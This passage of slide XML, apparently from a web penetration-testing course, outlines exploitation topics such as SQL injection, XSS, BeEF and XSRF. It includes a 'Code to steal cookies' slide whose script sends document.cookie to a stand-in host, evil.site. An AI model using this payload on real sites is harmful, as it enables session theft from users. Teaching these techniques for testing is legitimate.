              <a:t>E-mail</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Previous Steps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The previous steps have planned the attacks in this step</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Gained information used here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovered vulnerabilities we will exploit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133600"/>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100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exploitation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Bypass Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Authentication Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Authentication Bypass Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Injection Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> File Handling with SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> OS Interaction with SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sqlmap Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Port Scanning with SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> File Injection with SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Prepared Injection Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Prepared Files Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11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100" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Blind SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Persistent XSS Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Advanced XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Durzosploit Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> XSS Frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> BeEF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> BeEF Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Limiting XSS targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> XSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> MonkeyFist Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Putting It Together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Scenario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Next Steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Conclusions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74758"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82947"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1981200"/>
            <a:ext cx="8458200" cy="4724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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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82950"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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Should be called Script injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Targets the client using the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Two types of XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reflective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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>POST XSS Flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1327673"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The HTTP POST method does not use the URL for parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This makes XSS harder to demonstrate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Tools are available to redirect HTTP GET requests to HTTP POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This allows us to build a link to demonstrate the flaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Secure Ideas has released a demo of this type of tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Its available at http://www.secureideas.net/tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Install this on a server we control!</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typical Exploits with XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are a number of typical attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reading Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Redirecting a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Modifying content on a page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>XSS allows for running any client-side code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Remember it can use any supported client-side technology</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reading Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413480" y="1756350"/>
            <a:ext cx="8305800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Code to steal cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;document.write('</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;img src="http://evil.site/'+document.cookie+'"&gt;')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Creates an image tag on the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sends a request to our site that includes cookies from the vulnerable site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Our HTTP logs includes this information</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cookie Catcher</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475940" y="1771340"/>
